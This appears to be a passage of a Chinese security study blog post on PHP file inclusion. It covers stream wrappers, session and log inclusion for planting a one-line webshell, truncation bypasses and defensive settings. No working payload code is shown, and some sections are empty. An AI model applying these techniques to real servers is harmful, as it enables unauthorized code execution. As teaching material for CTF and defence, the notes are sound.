<p>包含日志文件参考文章</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vbXkxZTMvcC81ODU0ODk3Lmh0bWw=">https://www.cnblogs.com/my1e3/p/5854897.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9yajQ1bXAuZ2l0aHViLmlvLyVFNiU5QyVBQyVFNSU5QyVCMCVFNiU5NiU4NyVFNCVCQiVCNiVFNSU4QyU4NSVFNSU5MCVBQiVFNCVCOSU4QiVFNSU4QyU4NSVFNSU5MCVBQiVFNiU5NyVBNSVFNSVCRiU5NyVFOCU4RSVCNyVFNSU4RiU5NndlYnNoZWxsLw==">https://rj45mp.github.io/本地文件包含之包含日志获取webshell/</span></p>
<p>#0x03 伪协议</p>
<h2 id="⌛️含义"><a href="#⌛️含义" class="headerlink" title="⌛️含义"></a>⌛️含义</h2><p>PHP伪协议在CTF中经常出现，也经常跟文件包含，文件上传，命令执行等漏洞结合在一起。伪协议的含义：php中为了读取http请求的参数、数据流、压缩包等，</p>
<h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><p>php中支持的伪协议</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">file:// — 访问本地文件系统,读取文件</span><br><span class="line">http:// — 访问 HTTP(s) 网址</span><br><span class="line">ftp:// — 访问 FTP(s) URLs</span><br><span class="line">php:// — 访问各个输入/输出流（I/O streams）</span><br><span class="line">zlib:// — 压缩流</span><br><span class="line">data:// — 数据（RFC 2397）</span><br><span class="line">glob:// — 查找匹配的文件路径模式</span><br><span class="line">phar:// — PHP 归档</span><br><span class="line">ssh2:// — Secure Shell 2</span><br><span class="line">rar:// — RAR</span><br><span class="line">ogg:// — 音频流</span><br><span class="line">expect:// — 处理交互式的流</span><br></pre></td></tr></table></figure>



<h3 id="php-协议"><a href="#php-协议" class="headerlink" title="php://协议"></a>php://协议</h3><ul>
<li>php://filter</li>
</ul>
<p>可以作为一个中间流来处理其他流，可以进行任意文件的读取；</p>
<p>是一种元封装器，设计用于数据流打开时筛选过滤应用。这个定义比较抽象。根据名字，filter，过滤器，可以很容易想到这个协议可以用来过滤一些东西；</p>
<p>使用不同的参数可以达到不同的目的和效果：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">resource=&lt;要过滤的数据流&gt; --- 指定了你要筛选过滤的数据流 --- 必选</span><br><span class="line"></span><br><span class="line">read=&lt;读链的筛选列表&gt; --- 可以设定一个或多个过滤器名称，以管道符（|）分隔 --- 可选</span><br><span class="line"></span><br><span class="line">write=&lt;写链的筛选列表&gt; --- 可以设定一个或多个过滤器名称，以管道符（|）分隔 --- 可选</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>





















<p>php://filter </p>
<p>php://input 可以读取post里面的参数</p>
<p>zip://  (访问压缩包里的文件需要用到#，编码后是%23)</p>
<p>compress.bzip2://</p>
<p>compress.zipb://</p>
<p>data:// (类似input，可以让用户来控制输入流)</p>
<p>phar:// (解压缩包的一个函数，不管后缀是什么，都会当作压缩包来解压)</p>
<h1 id="session文件包含"><a href="#session文件包含" class="headerlink" title="session文件包含"></a>session文件包含</h1><h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>利用session的位置可以存储的特性来getshell。</p>
<p>php默认生成的session文件往往放在/tmp目录下。</p>
<h1 id="0x0-漏洞的利用"><a href="#0x0-漏洞的利用" class="headerlink" title="0x0 漏洞的利用"></a>0x0 漏洞的利用</h1><h2 id="伪协议的利用"><a href="#伪协议的利用" class="headerlink" title="伪协议的利用"></a>伪协议的利用</h2><p>使用<code>php://filter</code>协议读取index文件</p>
<p>[题目2]</p>
<p>网址 <span class="exturl" data-url="aHR0cDovLzQuY2hpbmFsb3Zlci5zaW5hYXBwLmNvbS93ZWI3L2luZGV4LnBocA==">http://4.chinalover.sinaapp.com/web7/index.php</span></p>
<p>wp</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="其他利用方式"><a href="#其他利用方式" class="headerlink" title="其他利用方式"></a>其他利用方式</h2><h3 id="四个绕过方式"><a href="#四个绕过方式" class="headerlink" title="四个绕过方式"></a>四个绕过方式</h3><ul>
<li>00截断</li>
</ul>
<p>Windows读取遇到00时，就停止了，后面的内容就不再读取了。</p>
<ul>
<li>长度截断</li>
</ul>
<p>window最大读取长度256位，Linux4096位</p>
<ul>
<li>包含日志文件</li>
</ul>
<p>日志中会保存请求的内容，可以写入一句话木马，然后再包含日志文件</p>
<ul>
<li>包含session</li>
</ul>
<p>session中会保存一些较为敏感的信息，会存放在一些目录/文件中。如果session可控并且知道路径，可以往session中写入一句话木马，再包含session</p>
<h1 id="0x03-漏洞的防御"><a href="#0x03-漏洞的防御" class="headerlink" title="0x03 漏洞的防御"></a>0x03 漏洞的防御</h1><ul>
<li><p>allow_url_fopen=Off<br>allow_url_include=Off</p>
</li>
</ul>
<ul>
<li>open_basedir</li>
</ul>
<p>使用open_basedir配置，限制访问在指定的区域，比如只能访问某个固定的目录</p>
<ul>
<li>过滤 . / \ (点 斜杠 反斜杠)</li>
</ul>
<p>这样可以禁止 跨目录访问文件</p>
<ul>
<li>禁止服务器远程文件包含</li>
</ul>
<ul>
<li>尽量不使用动态包含，在需要包含的页面固定写好</li>
</ul>
<h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><ul>
<li>[b站漏洞银行]—第15讲 - 文件包含漏洞原理详解丨小白WEB安全入门—<span class="exturl" data-url="aHR0cHM6Ly93d3cuYmlsaWJpbGkuY29tL3ZpZGVvL0JWMXhKNDExRDdXTT9mcm9tPXNlYXJjaCZhbXA7c2VpZD01NTAzMjU3Nzk1ODM2Njk2MDg4">https://www.bilibili.com/video/BV1xJ411D7WM?from=search&amp;seid=5503257795836696088</span></li>
<li></li>
</ul>
<ul>
<li>[Web安全实战系列：文件包含漏洞] <span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vYXJ0aWNsZXMvd2ViLzE4MjI4MC5odG1s">https://www.freebuf.com/articles/web/182280.html</span>  正在</li>
<li>[文件包含CTF题目]<span class="exturl" data-url="aHR0cHM6Ly93d3cuamlhbnNodS5jb20vcC82YWY4ZTc2ZDIyYTU=">https://www.jianshu.com/p/6af8e76d22a5</span> 正在</li>
</ul>
<h1 id="待看资料"><a href="#待看资料" class="headerlink" title="待看资料"></a>待看资料</h1><ul>
<li>总</li>
</ul>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTExNjY1Ny9hcnRpY2xlL2RldGFpbHMvMTAwNjAyNzY5">https://blog.csdn.net/weixin_45116657/article/details/100602769</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuYnVnZm9yLmNvbS9xdWFuemkvMzQyMy5odG1s">https://www.bugfor.com/quanzi/3423.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20veHV5aXFpbmcvcC85OTc0NDYxLmh0bWw=">https://www.cnblogs.com/xuyiqing/p/9974461.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20veXV6bHkvcC8xMDc5OTQ4Ni5odG1s">https://www.cnblogs.com/yuzly/p/10799486.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZC9hcnRpY2xlL2RldGFpbHMvODA0MDA3MjU=">https://blog.csdn.net/he_and/article/details/80400725</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuamlhbnNodS5jb20vcC9jOTcyMjIyNDI1MGU=">https://www.jianshu.com/p/c9722224250e</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly94ei5hbGl5dW4uY29tL3QvNzE3Ng==">https://xz.aliyun.com/t/7176</span></p>
<ul>
<li>session</li>
</ul>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuamlhbnNodS5jb20vcC82MjRmZTZkMDljMGI=">https://www.jianshu.com/p/624fe6d09c0b</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zZWFyY2g/c3hzcmY9QUxlS2swMl9SbFhvamFIWEFLR3IwNmZtLUduU2dvbmc0dzoxNjAzOTAwMjM2MDU5JmFtcDtzb3VyY2U9aHAmYW1wO2VpPVRKT1pYNjk1bGZ2NUJvWE9yY0FEJmFtcDtxPXNlc3Npb24rJUU2JTk2JTg3JUU0JUJCJUI2JUU1JThDJTg1JUU1JTkwJUFCJmFtcDtvcT1zZXNzaW9uKyVFNiU5NiU4NyVFNCVCQiVCNiVFNSU4QyU4NSVFNSU5MCVBQiZhbXA7Z3NfbGNwPUNnWndjM2t0WVdJUUF6b0ZDQUFRc1FNNkNBZ0FFTEVERUlNQk9nSUlBRG9FQ0NNUUp6b0hDQUFRc1FNUUREb0VDQUFRRERvRUNBQVFDam9GQ0NFUW9BRlExenRZNVZwZzlsMW9BSEFBZUFDQUFkMENpQUgxSDVJQkNEQXVNVGN1TWk0eW1BRUFvQUVCcWdFSFozZHpMWGRwZWcmYW1wO3NjbGllbnQ9cHN5LWFiJmFtcDt2ZWQ9MGFoVUtFd2l2ejhyLTBkZnNBaFdWZmQ0S0hRVm5DemdRNGRVRENBYyZhbXA7dWFjdD01">https://www.google.com/search?sxsrf=ALeKk02_RlXojaHXAKGr06fm-GnSgong4w%3A1603900236059&amp;source=hp&amp;ei=TJOZX695lfv5BoXOrcAD&amp;q=session+%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB&amp;oq=session+%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB&amp;gs_lcp=CgZwc3ktYWIQAzoFCAAQsQM6CAgAELEDEIMBOgIIADoECCMQJzoHCAAQsQMQDDoECAAQDDoECAAQCjoFCCEQoAFQ1ztY5Vpg9l1oAHAAeACAAd0CiAH1H5IBCDAuMTcuMi4ymAEAoAEBqgEHZ3dzLXdpeg&amp;sclient=psy-ab&amp;ved=0ahUKEwivz8r-0dfsAhWVfd4KHQVnCzgQ4dUDCAc&amp;uact=5</span></p>
<p>视频 <span class="exturl" data-url="aHR0cHM6Ly93d3cuYmlsaWJpbGkuY29tL3ZpZGVvL0JWMVpWNDExQjdDcz9mcm9tPXNlYXJjaCZhbXA7c2VpZD0zMzc2MTExOTEyNDM5MjY3Mzc2">https://www.bilibili.com/video/BV1ZV411B7Cs?from=search&amp;seid=3376111912439267376</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly96aHVhbmxhbi56aGlodS5jb20vcC81ODYxMTAzNw==">https://zhuanlan.zhihu.com/p/58611037</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zZWFyY2g/c291cmNlPWhwJmFtcDtlaT1wWS1aWDlYOEJZaXptQVdFaHI2Z0NRJmFtcDtxPXNlc3Npb24rJUU2JTk2JTg3JUU0JUJCJUI2JUU1JThDJTg1JUU1JTkwJUFCJmFtcDtvcT1zZXNzaW9uKyVFNiU5NiU4NyVFNCVCQiVCNiVFNSU4QyU4NSVFNSU5MCVBQiZhbXA7Z3NfbGNwPUNnWndjM2t0WVdJUUF6SUVDQUFRRERJRUNBQVFERG9GQ0FBUXNRTTZDQWdBRUxFREVJTUJPZ0lJQURvSENBQVFSaERfQVRvRUNBQVFDbENkQjFpV0ttRGdLMmdDY0FCNEFvQUJyd1NJQWFZbmtnRU1NQzR4Tmk0eUxqRXVNUzR5bUFFQW9BRUJxZ0VIWjNkekxYZHBlZyZhbXA7c2NsaWVudD1wc3ktYWImYW1wO3ZlZD0wYWhVS0V3aVY0LVBBenRmc0FoV0lHYVlLSFFTREQ1UVE0ZFVEQ0FvJmFtcDt1YWN0PTU=">https://www.google.com/search?source=hp&amp;ei=pY-ZX9X8BYizmAWEhr6gCQ&amp;q=session+文件包含&amp;oq=session+文件包含&amp;gs_lcp=CgZwc3ktYWIQAzIECAAQDDIECAAQDDoFCAAQsQM6CAgAELEDEIMBOgIIADoHCAAQRhD_AToECAAQClCdB1iWKmDgK2gCcAB4AoABrwSIAaYnkgEMMC4xNi4yLjEuMS4ymAEAoAEBqgEHZ3dzLXdpeg&amp;sclient=psy-ab&amp;ved=0ahUKEwiV4-PAztfsAhWIGaYKHQSDD5QQ4dUDCAo&amp;uact=5</span></p>
<ul>
<li>伪协议</li>
</ul>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vMG50aDN3YXkvYXJ0aWNsZXMvNzE1OTI1My5odG1s">https://www.cnblogs.com/0nth3way/articles/7159253.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuc21pMWUudG9wLyVFNiU5NiU4NyVFNCVCQiVCNiVFNSU4QyU4NSVFNSU5MCVBQiVFNiVCQyU4RiVFNiVCNCU5RSVFNCVCOCU4RXBocCVFNCVCQyVBQSVFNSU4RCU4RiVFOCVBRSVBRS8=">https://www.smi1e.top/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E4%B8%8Ephp%E4%BC%AA%E5%8D%8F%E8%AE%AE/</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zZWFyY2g/c3hzcmY9QUxlS2swMGs0RjdGNVhwSnhNSmVUUi04TngycjMxUm9IdzoxNjAzODk2MjE3MTY3JmFtcDtzb3VyY2U9aHAmYW1wO2VpPW1ZT1pYNzcyQjZMeGh3UFk5N1NnRHcmYW1wO3E9JUU2JTk2JTg3JUU0JUJCJUI2JUU1JThDJTg1JUU1JTkwJUFCKyVFNCVCQyVBQSVFNSU4RCU4RiVFOCVBRSVBRSZhbXA7b3E9JUU2JTk2JTg3JUU0JUJCJUI2JUU1JThDJTg1JUU1JTkwJUFCKyVFNCVCQyVBQSVFNSU4RCU4RiVFOCVBRSVBRSZhbXA7Z3NfbGNwPUNnWndjM2t0WVdJUUF6b0VDQ01RSnpvQ0NBQTZCUWdBRUxFRE9nZ0lBQkN4QXhDREFWREZCRmp6SldEN0oyZ0FjQUI0QUlBQnhBU0lBZW9Oa2dFTE1DNHlMakF1TVM0eExqR1lBUUNnQVFHcUFRZG5kM010ZDJsNiZhbXA7c2NsaWVudD1wc3ktYWImYW1wO3ZlZD0wYWhVS0V3ai1wcDJDdzlmc0FoV2ktR0VLSGRnN0RmUVE0ZFVEQ0FjJmFtcDt1YWN0PTU=">https://www.google.com/search?sxsrf=ALeKk00k4F7F5XpJxMJeTR-8Nx2r31RoHw%3A1603896217167&amp;source=hp&amp;ei=mYOZX772B6LxhwPY97SgDw&amp;q=%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB+%E4%BC%AA%E5%8D%8F%E8%AE%AE&amp;oq=%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB+%E4%BC%AA%E5%8D%8F%E8%AE%AE&amp;gs_lcp=CgZwc3ktYWIQAzoECCMQJzoCCAA6BQgAELEDOggIABCxAxCDAVDFBFjzJWD7J2gAcAB4AIABxASIAeoNkgELMC4yLjAuMS4xLjGYAQCgAQGqAQdnd3Mtd2l6&amp;sclient=psy-ab&amp;ved=0ahUKEwj-pp2Cw9fsAhWi-GEKHdg7DfQQ4dUDCAc&amp;uact=5</span></p>
<p>视频 <span class="exturl" data-url="aHR0cHM6Ly93d3cuYmlsaWJpbGkuY29tL3ZpZGVvL0JWMTJLNDExTjd1QT9wPTEy">https://www.bilibili.com/video/BV12K411N7uA?p=12</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2Rlc3RpbnkxNTA3L2FydGljbGUvZGV0YWlscy84MjM0NzM3MQ==">https://blog.csdn.net/destiny1507/article/details/82347371</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vY29sdW1uLzE0ODg4Ni5odG1s">https://www.freebuf.com/column/148886.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuamlhbnNodS5jb20vcC8wYTgzMzlmY2MyNjk=">https://www.jianshu.com/p/0a8339fcc269</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zZWFyY2g/c291cmNlPWhwJmFtcDtlaT0xNGlaWDdtQ0NzLUVyN3dQMHFhX3FBTSZhbXA7cT0lRTQlQkMlQUElRTUlOEQlOEYlRTglQUUlQUUrY3RmJmFtcDtvcT0lRTQlQkMlQUElRTUlOEQlOEYlRTglQUUlQUUrY3RmJmFtcDtnc19sY3A9Q2dad2Mza3RZV0lRQXpvQ0NBQTZCUWdBRUxFRE9nZ0lBQkN4QXhDREFUb0hDQUFRc1FNUUREb0VDQUFRRERvS0NBQVFzUU1RZ3dFUUREb0VDQUFRSGpvR0NBQVFCUkFlVUlzTFdOWWdZTjBpYUFGd0FIZ0FnQUdxQVlnQnB3LVNBUVF3TGpFem1BRUFvQUVCcWdFSFozZHpMWGRwZXJBQkFBJmFtcDtzY2xpZW50PXBzeS1hYiZhbXA7dmVkPTBhaFVLRXdqNXlaU0N5TmZzQWhWUHdvc0JIVkxURHpVUTRkVURDQW8mYW1wO3VhY3Q9NQ==">https://www.google.com/search?source=hp&amp;ei=14iZX7mCCs-Er7wP0qa_qAM&amp;q=伪协议+ctf&amp;oq=伪协议+ctf&amp;gs_lcp=CgZwc3ktYWIQAzoCCAA6BQgAELEDOggIABCxAxCDAToHCAAQsQMQDDoECAAQDDoKCAAQsQMQgwEQDDoECAAQHjoGCAAQBRAeUIsLWNYgYN0iaAFwAHgAgAGqAYgBpw-SAQQwLjEzmAEAoAEBqgEHZ3dzLXdperABAA&amp;sclient=psy-ab&amp;ved=0ahUKEwj5yZSCyNfsAhVPwosBHVLTDzUQ4dUDCAo&amp;uact=5</span></p>
<ul>
<li>题目 </li>
</ul>
<p><span class="exturl" data-url="aHR0cHM6Ly9idXVvai5jbi9jaGFsbGVuZ2Vz">https://buuoj.cn/challenges</span></p>

      <div class="tags">
          <a href="/tags/web/" rel="tag"><i class="ic i-tag"></i> web</a>
          <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag"><i class="ic i-tag"></i> 文件包含</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2020-10-31 18:13:33" itemprop="dateModified" datetime="2020-10-31T18:13:33+08:00">2020-10-31</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="1ss4k WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="1ss4k Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="1ss4k PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>1ss4k <i class="ic i-at"><em>@</em></i>Parallel universe
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2020/10/19/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含">http://example.com/2020/10/19/文件包含/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="nav">
    <div class="item left">
    </div>
    <div class="item right">
      

  <a href="/2020/10/20/%E5%9C%A8%E9%BB%91%E6%9A%97%E4%B8%AD%E6%8A%95%E6%8E%B7%E9%A3%9E%E9%95%96%EF%BC%9F/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclwuom7cj20zk0m8dvn.jpg" title="机器学习_在黑暗中投掷飞镖？">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> paper笔记</span>
  <h3>机器学习_在黑暗中投掷飞镖？</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">0x00 文件包含的基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E6%A6%82%E5%BF%B5"><span class="toc-number">1.1.</span> <span class="toc-text">文件包含的概念</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%87%BD%E6%95%B0"><span class="toc-number">1.2.</span> <span class="toc-text">文件包含函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E4%B8%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">1.3.</span> <span class="toc-text">目录遍历与文件包含的区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83"><span class="toc-number">1.4.</span> <span class="toc-text">靶场环境</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#dvwa"><span class="toc-number">1.4.1.</span> <span class="toc-text">dvwa</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#LFI-labs"><span class="toc-number">1.4.2.</span> <span class="toc-text">LFI labs</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#phpstudy2018"><span class="toc-number">1.4.3.</span> <span class="toc-text">phpstudy2018</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7"><span class="toc-number">1.5.</span> <span class="toc-text">工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#hackbar"><span class="toc-number">1.5.1.</span> <span class="toc-text">hackbar</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%9A%81%E5%89%91"><span class="toc-number">1.5.2.</span> <span class="toc-text">蚁剑</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#burpsuite"><span class="toc-number">1.5.3.</span> <span class="toc-text">burpsuite</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#curl"><span class="toc-number">1.5.4.</span> <span class="toc-text">curl</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%B2%E6%8E%88%E6%80%9D%E8%B7%AF"><span class="toc-number">1.6.</span> <span class="toc-text">讲授思路</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-number">2.</span> <span class="toc-text">0x01 文件包含漏洞基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BA%A7%E7%94%9F%E7%9A%84%E5%8E%9F%E5%9B%A0"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞产生的原因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.2.</span> <span class="toc-text">本地文件包含漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E2%8C%9B%EF%B8%8F%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.3.</span> <span class="toc-text">⌛️远程文件包含漏洞</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02%E5%8C%85%E5%90%AB%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%E8%8E%B7%E5%8F%96webshell"><span class="toc-number">3.</span> <span class="toc-text">0x02包含日志文件获取webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-number">3.1.</span> <span class="toc-text">基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-number">3.1.1.</span> <span class="toc-text">利用场景</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">3.1.2.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6"><span class="toc-number">3.1.3.</span> <span class="toc-text">利用条件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%97%A5%E5%BF%97%E5%AD%98%E6%94%BE%E8%B7%AF%E5%BE%84"><span class="toc-number">3.2.</span> <span class="toc-text">获取日志存放路径</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BB%98%E8%AE%A4%E8%B7%AF%E5%BE%84"><span class="toc-number">3.2.1.</span> <span class="toc-text">默认路径</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web%E4%B8%AD%E9%97%B4%E4%BB%B6%E9%BB%98%E8%AE%A4%E9%85%8D%E7%BD%AE"><span class="toc-number">3.2.2.</span> <span class="toc-text">web中间件默认配置</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E2%8C%9B%EF%B8%8F%E5%90%AB%E4%B9%89"><span class="toc-number">3.3.</span> <span class="toc-text">⌛️含义</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E7%B1%BB"><span class="toc-number">3.4.</span> <span class="toc-text">分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php-%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.4.1.</span> <span class="toc-text">php:&#x2F;&#x2F;协议</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#session%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">4.</span> <span class="toc-text">session文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-1"><span class="toc-number">4.1.</span> <span class="toc-text">原理</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x0-%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text">0x0 漏洞的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.1.</span> <span class="toc-text">伪协议的利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="toc-number">5.2.</span> <span class="toc-text">其他利用方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B%E4%B8%AA%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="toc-number">5.2.1.</span> <span class="toc-text">四个绕过方式</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E7%9A%84%E9%98%B2%E5%BE%A1"><span class="toc-number">6.</span> <span class="toc-text">0x03 漏洞的防御</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">6.0.1.</span> <span class="toc-text">参考资料</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a 